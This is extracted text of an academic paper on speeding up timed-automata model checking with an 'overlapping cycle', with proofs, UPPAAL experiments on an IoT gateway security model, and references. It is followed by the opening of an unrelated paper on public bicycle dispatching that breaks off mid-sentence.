real-time model based on an overlapping cycle is an improved Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.272 12/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.272 method based on the parking cycle. It attempts to extend the application field of exact acceleration technology to complex real-time model checking to improve efficiency and alleviate state explosion. Theorem 4. Let M =(C,L,l0,A,I,E) be a timed automaton with several acceleratable cycles. Let Cyclei= (Eci,x) be the ith acceleratable cycle of M with a window of [ai,bi], where i is a non-zero natural number. All acceleratable cycles affect the cycle of clock x, and their reset locations are uniform in lreset ∈L. There is a single acceleratable cycle whose effect is the most effective in obtaining a continuous clock zone than multiple acceleratable cycles. Proof. Let nj = ⌈ aj bj−aj ⌉ ×aj, nk = ⌈ ak bk−ak ⌉ ×ak, where 1≤ j,k≤ i, and j, k are non-zero natural numbers. Then, nj and nk represent the edge guard of the jth and kth acceleratable cycle, respectively, when adding a parking cycle. If these two acceleratable cycles are executed simultaneously, the edge guard can be expressed as njk = ⌈ aj+ak (bj−aj)+(bk−ak) ⌉ × ( aj+ak ) . The window of the ith acceleratable cycle is [ai,bi] as a known condition, where 0≤aj ≤bj, 0≤ak ≤bk, and there is aj+ak ≥aj,ak. We make aj bj−aj = U V , ak bk−ak = X Y , such that aj+ak (bj−aj)+(bk−ak) = U+X V+Y . We assume that U V is smaller, then XY = U+µ V , µ∈R +. Therefore, there is U+XV+Y = U+U+µ V+V = U V + µ 2V > U V ; that is,⌈U+X V+Y ⌉ ≥ ⌈U V ⌉ and ⌈U+X V+Y ⌉ ≥min( ⌈U V ⌉ , ⌈X Y ⌉ ). In the positive-number condition, a larger number multiplied by a larger number is either equal to or greater than a smaller number multiplied by a smaller number; therefore,⌈ U +X V +Y ⌉ ×(aj+ak)≥min( ⌈ U V ⌉ ×aj, ⌈ X Y ⌉ ×ak) which is njk ≥min(nj,nk). According to Corollary 1, the reset location will obtain a continuous clock zone after executing the acceleratable cycle, which has a smaller value of ⌈ ai bi−ai ⌉ ×ai, ⌈ ai bi−ai ⌉ times during forward symbolic reachability analysis. This solution is faster than using two acceleratable cycles simultaneously to obtain a continuous clock zone, and it is better than using the larger one. By extension, when comparing any two acceleratable cycles, a shorter time cycle always obtains a continuous clock zone more quickly. When comparing all acceleratable cycles, we can achieve the most effective acceleratable cycle for exact acceleration. This result indicates that the acceleration effect of a single acceleratable cycle is more effective than that of multiple acceleratable cycles, thereby completing the proof. Corollary 4. Let M =(C,L,l0,A,I,E) be a timed automaton with several acceleratable cycles. Let Cyclei= (Eci,x) be the ith acceleratable cycle of M with a window of [ai,bi], where i is a non-zero natural number. All acceleratable cycles affect the cycle of clock x, and their reset locations are uniform in lreset ∈L. If ai <bi, then the acceleratable cycle with the min (⌈ ai bi−ai ⌉ ×ai ) has the best acceleration effect of obtaining a continuous clock zone in the shortest time. Proof. According to Theorem 4, comparing any two acceleratable cycles, a cycle with smaller value of (⌈ ai bi−ai ⌉ ×ai ) always obtains a continuous clock zone more quickly. Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.272 13/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.272 When comparing all acceleratable cycles, the cycle with the min (⌈ ai bi−ai ⌉ ×ai ) obviously has the most effective acceleration. The proof is completed. Definition 6 (Accelerated automaton based on overlapping cycle). Let M = (C,L,l0,A,I,E) be a timed automaton with k acceleratable cycles, where L = {l0,l1,...,lm}. CYCLE ={Cycle1,...,Cyclek|k ∈N+} denotes the acceleratable cycle set. Let Cyclei=(Eci,x) be the ith acceleratable cycle with a window of [ai,bi], where 0≤ i≤k, Ec= (e0,e1,...,en−1), eji= (lji,aji,τji,λji,l(j+1)i). All acceleratable cycles affect the cycle of clock x, and their reset locations are uniform in lreset ∈L. The global clock is y, and the maximum value of y before entering the acceleratable cycle is n0. The acceleration of M based on the overlapping cycle is a new automaton Acco(M,CYCLE) defined as (C,L′,l0,A,I ′,E′), where • L′=L∪ { l′reset } • I ′(lh)= I(lh), 0≤h≤m • I ′ ( l′reset ) =∅ • E′=E∪ {( lreset,∅,τ ′,∅,l′reset ) , ( l′reset,∅,∅,λ ′,lreset )} , τ ′ is y ≥min (⌈ ai bi−ai ⌉ ×ai ) +n0 and λ′ only contains x. The accelerated automaton Acco(M,CYCLE) equals the timed automaton M with the addition of an overlapping cycle at only one reset location, which solves the problem where an exact acceleration cannot be used directly for complex real-time model checking. The overlapping cycle only needs to analyze all windows of every acceleratable cycle in CYCLE for the calculation. We can also avoid using an appended cycle or parking cycle for each acceleratable cycle, greatly reducing the additive symbolic state. Figure 5 depicts the acceleration of M ′ (Fig. 4) based on an overlapping cycle, named accelerated automaton M ′ o. Because the timed automaton M ′ contains four acceleratable cycles, we analyze them separately, discard the deadlocked cycle, and only retain three executable cycles. The deadlocked cycle consists with location l1,l2,l3,l4,l5,l6,l7,l8,l9,l10,l14,l13,l1 in sequence. For further analysis, the windows of acceleratable cycles are calculated as [7,18], [6,16], and [13,24]. By taking the minimum value of ⌈ ai bi−ai ⌉ ×ai, we can obtain the overlapping cycle’s entry condition, which is y ≥6. Theorem 5. Let M =(C,L,l0,A,I,E) be a timed automaton with several acceleratable cycles. Let Cyclei = (Eci,x) be the ith acceleratable cycle of M with a window of [ai,bi], where i is a non-zero natural number. If x is reset on edge e0, then the subsequent states of src(e0) reachable by multiple acceleratable cycles in M, are reachable by exactly one execution of the overlapping cycle in Acco(M,CYCLE). Proof. For a certain acceleratable cycle, its window is set as [ a′,b′ ] . According to Theorem 1, when 3a′≤2b′, the appended cycle does not change the subsequent reachability of the reset location src(e0) in M. According to Theorem 2, when a′≤b′, the parking cycle does not change the subsequent reachability of the reset location src(e0) in M. In the case of multiple acceleratable cycles superimposing on the same location in a complex real-time system, the subsequent reachability of the reset location src(e0) in M can be guaranteed to remain unchanged if any part of the acceleratable cycle is processed with exact acceleration. Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.272 14/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.272 Figure 5 Automaton M ′o: acceleration of M ′ based on an overlapping cycle. Full-size DOI: 10.7717/peerjcs.272/fig-5 Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.272 15/24 https://peerj.com https://doi.org/10.7717/peerjcs.272/fig-5 http://dx.doi.org/10.7717/peerj-cs.272 Table 2 Runtime data comparing M ′ and its accelerated versions Ma′ , Mp′ and Mo′ . LARGE 104 105 106 107 108 109 Mem (KB) 27,020 26,892 27,392 27,544 27,952 28,572 M ′ Time (s) 0.032 0.256 1.688 12.045 120.333 1,191.025 Mem (KB) 28,328 29,220 30,468 31,688 32,508 34104 M ′ a Time (s) 0.007 0.008 0.008 0.008 0.009 0.009 Mem (KB) 27,184 27,384 27,788 28,060 28,208 29,276 M ′ p Time (s) 0.005 0.004 0.003 0.003 0.003 0.004 Mem (KB) 27,164 27,036 27,472 27,824 27,988 28,788 M ′ o Time (s) 0.002 0.002 0.002 0.003 0.002 0.002 According toTheorem 4, the accelerablecycle is moreeffective for obtaininga continuous clock zone at reset location src(e0) than multiple acceleratable cycles. In particular, according to Corollary 4, if ai < bi, then the exact acceleration based on overlapping cycle can obtain the continuous clock zone in the shortest time. The proof is completed. This theorem ensures the effectiveness of acceleration. For a single acceleratable cycle, if all states are reachable by more than one execution of the acceleratable cycle, then exactly only one execution of the acceleratable cycle of the appended cycle or parking cycle can guarantee reachability of all states in the accelerative automaton. The complex real-time model checking differs from the exact acceleration of a single acceleratable cycle. In depth-first forward symbolic reachability analysis, it is necessary to verify whether subsequent states are reachable in priority while ignoring the breadth-first search within cycles. In our case study of an IoT gateway security system (Wang et al., 2018), the control center must complete a security process and distribute it to each sensor node. Once a self-organizing sensor network completes the process, it can respond to the command of the control center in a timely manner. The control center can perform subsequent operations after receiving feedback regardless of whether other sensor nodes can complete the process. Hence, the security system must ensure its subsequent reachability regardless of who completes the process. This approach accelerates the search of subsequent states, thus avoiding time and space consumption caused by superposition of acceleratable cycles. EXPERIMENTAL RESULTS To verify the validity of the exact acceleration method based on an overlapping cycle for complex real-time model checking, we collected runtime data, including memory consumption and verification time, from the timed automaton M ′. We also gathered runtime data from the accelerated automata M ′ a, M ′ p, and M ′ o, which use the appended cycle, parking cycle, and overlapping cycle, respectively. We employed the model-checking tool UPPAAL with a depth-first search order to verify whether location L15 was reachable, which can give the time and memory consumption in verification automatically. Experimental results are displayed in Table 2. Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.272 16/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.272 Figure 6 Technical framework of IoT gateway security system. Full-size DOI: 10.7717/peerjcs.272/fig-6 Results show that the time consumption of M ′ increased with exponential growth of LARGE at a rate of nearly ten times without using exact acceleration. The memory consumption of M ′ increased slightly because no additional locations were added. The accelerated automaton M ′ a used an appended cycle, which reduced the time consumption, reflecting the advantages of exact acceleration. However, due to a large number of additional locations, the memory consumption of M ′ a increased dramatically. The accelerated automaton M ′ p used a parking cycle to reduce the time consumption further compared to M ′ a. The fixed length of the parking cycle reduced the number of additional locations compared to the appended cycle; accordingly, the memory consumption was much lower for M ′ p than for M ′ a but slightly higher than for M ′. The accelerated automaton M ′ o that used the proposed overlapping cycle exhibited minimal time consumption and only required the addition of a single, fixed-length location for the complex real-time model. The memory consumption of M ′ o was close to that of M ′, far less than that of M ′ a, and slightly better than that of M ′ p. We can explain the time and memory consumption of M ′ o by Theorem 5. The depth-first search order ensures that the overlapping cycle accelerates exploration before complete exploration of all accelerable cycles. A less theoretical study case involves model verification of the IoT gateway security system (Wang et al., 2018). The exact acceleration method based on the overlapping cycle was successfully applied in this case, significantly improving verification efficiency. The technical framework of the IoT gateway security system is illustrated in Fig. 6. An essential technology in the IoT gateway security system is the time-stamped advanced encryption standard algorithm. By introducing a timestamp into the key expansion phase, the round key can be dynamically updated with change over time to realize a cipher text change that ensures the security of confidential information. Due to the introduction of a timestamp, the system generates acceleratable cycles when modeled as timed automata. Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.272 17/24 https://peerj.com https://doi.org/10.7717/peerjcs.272/fig-6 http://dx.doi.org/10.7717/peerj-cs.272 Multiple acceleratable cycles are overlaid on the same location in particular scenarios, which requires overlapping cycle technology for exact acceleration. Our theory can be used to simulated the parallel execution of processes and idle cycles. However, the presence of urgent locations and synchronous channels may disturb exact acceleration. For example, if broadcast channel coordination occurs in an urgent location, the multi-party response of the broadcast should be completed before the next state location can be migrated. The execution time of the response process is not controlled by the cycle control program; thus, it is not appropriate to simply use exact acceleration technology for acceleration; the space–time loss of using acceleration technology should be compared to the broadcasting response. However, exact acceleration technology can often handle urgent locations and synchronous channels. The following case of an IoT gateway security system also involves these situations. As no extra time interference exists within the whole acceleration process, the exact acceleration technology can finally be successfully applied to system modeling and verification. The accelerated automaton based on an overlapping cycle is an approximation that can be adapted to verify the accuracy of invariance and reachability properties. Consider the processes in Fig. 7; these processes model a top architecture and a middleware control program consisting of locations, edges, and channels. The IoT gateway runs from the Start location, reads configuration information and performs gateway identity authentication. The underlying unified authentication service is invoked through channel StartAC for security authentication, and GatewayStatus is returned after authentication. If GatewayStatus =true, then the system enters the location EnterMiddle and transforms to the polling module of the middle layer through the StartMiddle channel. For the middle-layer polling module, polling begins through the StartMiddle channel, and the top-layer main module is returned by the FinishMiddle channel. Location CheckCategory controls whether polling logic ends up at a perception terminal or an execution terminal, which each have different processing methods. In the two polling processes, the underlying security service is invoked through the synchronization channel according to different requirements. The specific process can be interpreted by the meaning of state locations, synchronization channels, and variables as described by Wang et al. (2018). In particular, clock constraints are added during the stage of waiting for timing and the stage of keeping the equipment running. The top-layer main module model and middle-layer polling module model constitute the general framework of the IoT gateway security system. Security implementation depends on the underlying security service modules ultimately, hence it is necessary to improve model construction of the underlying security service modules. For complex system modeling with underlying services, we apply the exact acceleration method proposed in this paper, which can effectively improve the verification speed. To demonstrate the effect of exact acceleration, we checked all security properties of the IoT gateway security system model in Fig. 7. Several examples are presented below. (1) A[] not deadlock Property 1 is used to check deadlock and ensure all state locations will be reachable. (2) E<>Top.CheckGS Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.272 18/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.272 Figure 7 Part of the IoT gateway security system model. Full-size DOI: 10.7717/peerjcs.272/fig-7 (3) E<>Top.EnterMiddle imply Middle.CheckCategory Properties 2 and 3 are used to explore part of the state space. The truth of these two properties indicates that the implementation accelerated model is an exact acceleration with the overlapping cycle. (4) A[] Top.Restart imply c<=300 (5) A[] Top.Record imply c<=600 (6) A[] Middle.RetrieveData imply Middle.y>=30 (7) A[] Middle.WaitDevice imply Middle.y<=5 Properties 4–7 are examined in terms of whether subsequent states of the reset location are reachable. Clock c is a global clock and clock y is used to model the duration of one process. We measured time and memory consumption and explored states for these properties. The IoT gateway security system was modeled as a timed automaton MIoT , and the acceleration of MIoT with overlapping cycles was modeled as an automaton MIoTo. We used model checkers UPPAAL and KRONOS to verify security system properties automatically, such as confidentiality, availability, and authenticity in parallel processes. KRONOS is able Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.272 19/24 https://peerj.com https://doi.org/10.7717/peerjcs.272/fig-7 http://dx.doi.org/10.7717/peerj-cs.272 Table 3 Runtime data comparing MIoT and MIoTo. Explored States Time(s) Memory(KB) MIoT 108,302 71.151 29,660 MIoTo 47,545 1.049 30,840 Table 4 Comparing the performance of different exact acceleration techniques for large-scale IoT sys- tems. System states-scale Exact acceleration technique Verification time(s) 104 Appended cycle 277.860 104 Parking cycle 0.893 104 Overlapping cycle 0.015 105 Appended cycle ∞ 105 Parking cycle 72.218 105 Overlapping cycle 1.020 106 Parking cycle 364.720 106 Overlapping cycle 43.292 107 Parking cycle ∞ 107 Overlapping cycle 409.132 to complete the statistics of the state scale traversed by the whole verification process. It makes up for the fact that UPPAAL can’t do this. Table 3 lists the experimental results. On the premise of guaranteeing the security of IoT gateway system, a large number of underlying services and various applications can be embedded in the system framework. At this time, the security requirements of IoT gateway system are mainly for various new access services, and the framework security of the gateway itself can be maintained by its own mechanism. After access to a large number of services and applications, the original model will become complex, concurrent, real-time with large-scale. The verification of the system needs to be processed by the exact acceleration method based on overlapping cycle. With the increase of the number of access services, the system model becomes more and more complex, and the scale of access number greatly affect the efficiency of model verification. Appended cycle and parking cycle methods are more suitable for single accelerating cycle scenarios. In this complex scenario, when the number of services reaches a certain level, the acceleration process may not be completed. According to the change of the number of access services, Table 4 gives the comparison of the acceleration effects of different exact acceleration methods (from the perspective of time). The results show that for complex real-time systems, the acceleration efficiency of overlapping cycle is much higher than that of appended cycle and parking cycle, and the verification can still be completed when the state scale reaches 107 with proposed method. So, the exact accelerating technology substantially reduced the time required for verification in complex real-time model checking. Overlapping cycle acceleration demonstrated the highest efficiency compared to the appended cycle and parking cycle. In the simple example of automaton M ′ in Fig. 4, 55 additional locations were required when using the appended Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.272 20/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.272 cycle, much higher than the number of locations in the original model. Although the appended cycle reduced verification time, it increased the difficulty of adding locations to the model in an early stage. When many acceleratable cycles were stacked in the same reset position, more than one location needed to be added to M ′ when the parking cycle was used, although the length of the parking cycle was fixed. The parking cycle was neither simpler nor faster than the overlapping cycle, and its previous calculation was larger than that of the overlapping cycle. With the exception of this IoT case, our approach can be applied to other scenarios, such as security validation of blockchain smart contracts. The complete code and UPPAAL model can be found at https://github.com/iegqwang/UPPAAL. CONCLUSIONS To solve the fragmentation problem for complex real-time model checking, we propose an exact acceleration method based on an overlapping cycle, which is an application scenario extension of parking-cycle technique, to accelerate forward symbolic reachability analysis. Compared with the appended cycle or parking cycle for exact acceleration, the proposed method can be applied to the model acceleration of large-scale complex real-time systems and only requires the addition of a single, fixed-length location to the system’s timed automaton model. The addition of an overlapping cycle introduces far fewer symbolic states than using either an appended cycle or parking cycle. Rather than relying on windows of acceleratable cycles, the proposed accelerated automaton model is more straightforward and reduces the space–time overhead of exact acceleration. Two aspects warrant exploration in future research. First, we must continue to study the algorithm for the acceleratable cycle, try to simplify the original automaton model, guarantee its original property, and rapidly identify the deadlock. Second, we plan to develop a simple exact acceleration automatic checking platform that can consider other practical conditions such as action transitions, urgent locations, and synchronous channels to solve actual modeling problems more efficiently. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the Key Program of the National Natural Science Foundation of China (No. U1604262), the Key Scientific Research Project of Higher Education of Henan (No. 19A520003, 18A520006 and 17A520057), and the Key R&D and Promotion Project in Science and Technology of Henan (No. 182102210189). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Key Program of the National Natural Science Foundation of China: U1604262. Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.272 21/24 https://peerj.com https://github.com/iegqwang/UPPAAL http://dx.doi.org/10.7717/peerj-cs.272 Key Scientific Research Project of Higher Education of Henan: 19A520003, 18A520006, 17A520057. Key R&D and Promotion Project in Science and Technology of Henan: 182102210189. Competing Interests The authors declare there are no competing interests. Author Contributions • Guoqing Wang conceived and designed the experiments, performed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. • Lei Zhuang conceived and designed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. • Yu Song analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. • Mengyang He performed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. • Ding Ma performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • Ling Ma analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Codes are available at GitHub: https://github.com/iegqwang/UPPAAL. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.272#supplemental-information. REFERENCES Aceto L, Bouyer P, Burgueño A, Larsen KG. 2003. The power of reachability testing for timed automata. Theoretical Computer Science 300(1):411–475 DOI 10.1016/S0304-3975(02)00334-1. Alur R, Dill DL. 1994. A theory of timed automata. Theoretical Computer Science 126(2):183–235 DOI 10.1016/0304-3975(94)90010-8. Barnat J, Bauch P, Brim L, Češka M. 2010. Employing multiple CUDA devices to accel- erate LTL model checking. In: International Conference on Parallel and Distributed Systems, 2010. Piscataway: IEEE, 259–266 DOI 10.1109/ICPADS.2010.82. Behrmann G, Bouyer P, Larsen KG, Pelánek R. 2006. Lower and upper bounds in zone- based abstractions of timed automata. International Journal on Software Tools for Technology Transfer 8(3):204–215 DOI 10.1007/s10009-005-0190-0. Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.272 22/24 https://peerj.com https://github.com/iegqwang/UPPAAL http://dx.doi.org/10.7717/peerj-cs.272#supplemental-information http://dx.doi.org/10.7717/peerj-cs.272#supplemental-information http://dx.doi.org/10.1016/S0304-3975(02)00334-1 http://dx.doi.org/10.1016/0304-3975(94)90010-8 http://dx.doi.org/10.1109/ICPADS.2010.82 http://dx.doi.org/10.1007/s10009-005-0190-0 http://dx.doi.org/10.7717/peerj-cs.272 Behrmann G, David A, Larsen KG. 2004. A tutorial on Uppaal. In: International school on forman methods for the design of computer, communication and software systems, 2004. Berlin: Springer Verlag, 200–236 DOI 10.1007/978-3-540-30080-9_7. Boudjadar A, David A, Kim JH, Larsen KG, Mikučionis M, Nyman U, Skou A. 2016. Statistical and exact schedulability analysis of hierarchical scheduling systems. Science of Computer Programming 127:103–130 DOI 10.1016/j.scico.2016.05.008. Chadli M, Kim JH, Larsen KG, Legay A, Naujokat S, Steffen B, Traonouez LM. 2018. High-level frameworks for the specification and verification of scheduling problems. International Journal on Software Tools for Technology Transfer 20(4):397–422 DOI 10.1007/s10009-017-0466-1. Chen H, Cui L. 2016. Design and model checking of service-oriented software architec- ture for Internet of things: A survey. Chinese Journal of Computers 39(5):853–871 DOI 10.11897/SP.J.1016.2016.00853. Cruz JP, Kaji Y, Yanai N. 2018. RBAC-SC: role-based access control using smart contract. IEEE Access 6:12240–12251 DOI 10.1109/ACCESS.2018.2812844. Dubout C, Fleuret F. 2013. Accelerated training of linear object detectors. In: Com- puter vision and pattern recognition workshops, 2013. Piscataway: IEEE, 572–577 DOI 10.1109/CVPRW.2013.156. Gou L, Li Z, Wang C, Zhuang L. 2014. A method to determine the exact acceleration efficiency in model checking. Journal of Zhongyuan University of Technology 25(4):37–41 DOI 10.3969/j.issn.1671-6906.2014.04.009. Grishchenko I, Maffei M, Schneidewind C. 2018. Foundations and tools for the static analysis of ethereum smart contracts. In: Computer aided verification, 2018. Berlin: Springer Verlag, 51–78 DOI 10.1007/978-3-319-96145-3_4. Han D, Yang Q, Xing J. 2015. UML-based modeling and formal verification for software self-adaptation. Journal of Software 26(4):730–746 DOI 10.13328/j.cnki.jos.004758. Hendriks M, Larsen KG. 2002. Exact acceleration of real-time model checking. Electronic Notes in Theoretical Computer Science 65(6):120–139 DOI 10.1016/S1571-0661(04)80473-0. Herbreteau F, Srivathsan B, Walukiewicz L. 2016. Better abstractions for timed automata. Information and Computation 251:67–90 DOI 10.1016/j.ic.2016.07.004. Iversen TK, Kristoffersen KJ, Larsen KG, Laursen M, Madsen RG, Mortensen SK, Pettersson P, Thomasen CB. 2000. Model-checking real-time control programs: verifying LEGO R© MINDSTROMSTM systems using UPPAAL. In: Euromicro conference on real-time systems, 2000. Piscataway: IEEE, 147–155 DOI 10.1109/EMRTS.2000.854002. Jeong H, Yoo Y, Yi KM, Choi JY. 2014. Two-stage online inference model for traf- fic pattern analysis and anomaly detection. Machine Vision and Applications 25(6):1501–1517 DOI 10.1007/s00138-014-0629. Konur S, Fisher M, Schewe S. 2013. Combined model checking for temporal, probabilistic, and real-time logics. Theoretical Computer Science 503:61–88 DOI 10.1016/j.tcs.2013.07.012. Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.272 23/24 https://peerj.com http://dx.doi.org/10.1007/978-3-540-30080-9_7 http://dx.doi.org/10.1016/j.scico.2016.05.008 http://dx.doi.org/10.1007/s10009-017-0466-1 http://dx.doi.org/10.11897/SP.J.1016.2016.00853 http://dx.doi.org/10.1109/ACCESS.2018.2812844 http://dx.doi.org/10.1109/CVPRW.2013.156 http://dx.doi.org/10.3969/j.issn.1671-6906.2014.04.009 http://dx.doi.org/10.1007/978-3-319-96145-3_4 http://dx.doi.org/10.13328/j.cnki.jos.004758 http://dx.doi.org/10.1016/S1571-0661(04)80473-0 http://dx.doi.org/10.1016/j.ic.2016.07.004 http://dx.doi.org/10.1109/EMRTS.2000.854002 http://dx.doi.org/10.1007/s00138-014-0629 http://dx.doi.org/10.1016/j.tcs.2013.07.012 http://dx.doi.org/10.7717/peerj-cs.272 Lee J, Yu S, Park K, Park Y, Park Y. 2019. Secure three-factor authentication protocol for multi-gateway IoT environments. Sensors 19(10):2358–2383 DOI 10.3390/s19102358. Li G, Wei Q, Li L, Jin Z, Xu Y, Zheng L. 2013. Environment based modeling approach for services in the Internet of things. Science China Press 43(10):1198–1218 DOI 10.1360/N112013-00031. Lin K, Chen Y, Xu D. 2017. Reliability assessment model considering heterogeneous population in a multiple stresses accelerated test. Reliability Engineering & System Safety 165:134–143 DOI 10.1016/j.ress.2017.03.013. Möller MO. 2002. Parking can get you there faster: model augmentation to speed up real-time model checking. Electronic Notes in Theoretical Computer Science 65(6):202–217 DOI 10.1016/S1571-0661(04)80477-8. Pinisetty S, Jéron T, Tripakis S, Falcone Y, Marchand H, Preoteasa V. 2017. Pre- dictive runtime verification of timed properties. Journal of Systems and Software 132:353–365 DOI 10.1016/j.jss.2017.06.060. Qanadilo M, Samara S, Zhao Y. 2013. c. In: Latin-American symposium on dependable computing, 2013. Piscataway: IEEE, 40–47 DOI 10.1109/LADC.2013.20. Wang C, Pastore F, Briand L. 2019. Oracles for testing software timeliness with un- certainty. ACM Transactions on Software Engineering and Methodology 8(1):1–30 DOI 10.1145/3280987. Wang G, Zhuang L, Wang R, Song Y, Zhang K. 2018. Modeling and verifying based on timed automata of Internet of things gateway security system. Journal on Communications 39(3):63–75 DOI 10.11959/j.issn.1000-436x.2018042. Wang H, Zhong D, Zhao T, Ren F. 2019. Integrating model checking with SysML in complex system safety analysis. IEEE Access 7:16561–16571 DOI 10.1109/ACCESS.2019.2892745. Yin C, Song W, Zhuang L. 2010. Method of acceleratable cycles in identify timed automata. Computer Engineering and Design 31(23):5113–5115 DOI 10.16208/j.issn1000-7024.2010.23.030. Yin C, Zhuang L, Wang C. 2011. Exact acceleration of real-time model checking based on parking cycle. Acta Electronica Sinica 39(3):489–493 DOI 10.3969/j.issn.0372-2112.2011.03.001. Zhang F, Bu L, Wang L, Zhao J, Li X. 2013. Modeling and analysis of wireless sensor network protocols by stochastic timed automata and statistical model checking. Scientia Sinica Informationis 43(1):90–107 DOI 10.1360/112012-498. Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.272 24/24 https://peerj.com http://dx.doi.org/10.3390/s19102358 http://dx.doi.org/10.1360/N112013-00031 http://dx.doi.org/10.1016/j.ress.2017.03.013 http://dx.doi.org/10.1016/S1571-0661(04)80477-8 http://dx.doi.org/10.1016/j.jss.2017.06.060 http://dx.doi.org/10.1109/LADC.2013.20 http://dx.doi.org/10.1145/3280987 http://dx.doi.org/10.11959/j.issn.1000-436x.2018042 http://dx.doi.org/10.1109/ACCESS.2019.2892745 http://dx.doi.org/10.16208/j.issn1000-7024.2010.23.030 http://dx.doi.org/10.3969/j.issn.0372-2112.2011.03.001 http://dx.doi.org/10.1360/112012-498 http://dx.doi.org/10.7717/peerj-cs.272 work_wmp5caxjbrdcvfjdjjpiasghwa ---- Submitted 2 March 2019 Accepted 5 September 2019 Published 14 October 2019 Corresponding author Yang Yang, 162050103@hdu.edu.cn, yangyang_hdu@163.com Academic editor Xiangjie Kong Additional Information and Declarations can be found on page 27 DOI 10.7717/peerj-cs.224 Copyright 2019 Lin et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Urban public bicycle dispatching optimization method Fei Lin1, Yang Yang1,2, Shihua Wang1, Yudi Xu1, Hong Ma1 and Ritai Yu1 1 School of Computer Science and Technology, Hangzhou Dianzi University, Hangzhou, China 2 Current affiliation: Institute of Intelligent Media Technology, Communication University of Zhejiang, Hangzhou, China ABSTRACT Unreasonable public bicycle dispatching area division seriously affects the operational efficiency of the public bicycle system. To solve this problem, this paper innovatively proposes an improved community discovery algorithm based on multi-objective optimization (CDoMO). The data set is preprocessed into a lease/return relationship, thereby it calculated a similarity matrix, and the community discovery algorithm Fast Unfolding is executed on the matrix to obtain a scheduling scheme. For the results obtained by the algorithm, the workload indicators (scheduled distance, number of sites, and number of scheduling bicycles) should be adjusted to maximize the overall benefits, and the entire process is continuously optimized by a multi-objective optimization algorithm NSGA2. The experimental results show that compared with the clustering algorithm and the community discovery algorithm, the method can shorten the estimated scheduling distance by 20%–50%, and can effectively balance the scheduling workload of each area. The method can provide theoretical support for the public bicycle dispatching department, and improve the efficiency of public bicycle dispatching system. Subjects Data Mining and Machine Learning, Software Engineering Keywords Multi-objective optimization, Public bicycle system, Community discovery algorithm, Regional scheduling workload, Elite strategy INTRODUCTION With the progress of urbanization, people’s awareness of low carbon life and health is increasing. The public bicycle system can provide a green and healthy way to travel, and gradually become an important part of the public transport system. However, the study of the division of public bicycle dispatching area is still in the primary stage. The division of the public bicycle scheduling area has two purposes: decomposing the scheduling between large-scale sites, and reducing the computational complexity of path planning. At present, the mainstream regional division method is based on the urban administrative area, and each area is an independent scheduling area. However, the boundaries of residents’ travel are not as clear as the administrative areas. With the development of the city, the links between the areas are more closely related, so the division based on urban administrative areas is lack of scientific basis. Tulabandhula & Bodas (2018) proposed a passenger monitoring system for dispatching vehicles in a public transportation network, How to cite this article Lin F, Yang Y, Wang S, Xu Y, Ma H, Yu R. 2019. Urban public bicycle dispatching optimization method. PeerJ Comput. Sci. 5:e224 http://doi.org/10.7717/peerj-cs.224 https://peerj.com/computer-science mailto:162050103@hdu.edu.cn mailto:yangyang_hdu@163.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.224 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.224 it monitors passengers at the station, vehicle scheduling information and processed hardware equipment. Because the size and population density of each administrative area are different, the number of sites in each area varies greatly. Pan, Jun-Yi & Min (2015) designed a heuristic simulated annealing hybrid search algorithm for large-scale VRP distributed problems. Firstly, based on the actual road network of GIS, the mathematical model is established. Secondly, the large-scale VRP path planning problem is studied. The administrative area is large in size and concentrated in population. Forma, Raviv & Tzur (2015) considers the spatial nature of public bicycle rentals, and the original inventory factor of bicycles. Then the paper establishes a regional maximum diameter distance constraint model. Finally, the best classification results are obtained by heuristic algorithms to minimize the overall inventory cost. Therefore, there are more sites, public bicycle turnover is high, and dispatching workload is large; but if there are fewer sites, public bicycle turnover is low, and dispatching workload is small. Above all, lack of a scientific planning method often leads to higher scheduling capital costs. Schuijbroek, Hampshire & Hoeve (2016) applied the maximum algebra algorithm to the division of the public bicycle scheduling area, and the paper established the corresponding partition mathematical model. The goal of zoning is to minimize the maximum completion time based on a reasonable level of service. Aiming at the problems, this paper proposes an improved community discovery algorithm based on multi-objective optimization. By using this innovative algorithm, the results show that the algorithm brings three major benefits: it can effectively shorten the public bicycle scheduling distance, improve the scheduling efficiency, and effectively balance the workload of regional scheduling. RELATED WORK The division of the public bicycle dispatching area involves operational research, and researchers have made significant contribution. Public bicycles and buses, as well as cargo transport vehicles are public transport, and their operations have similarities. Therefore, they can learn dispatching methods from each other. Kloimllner 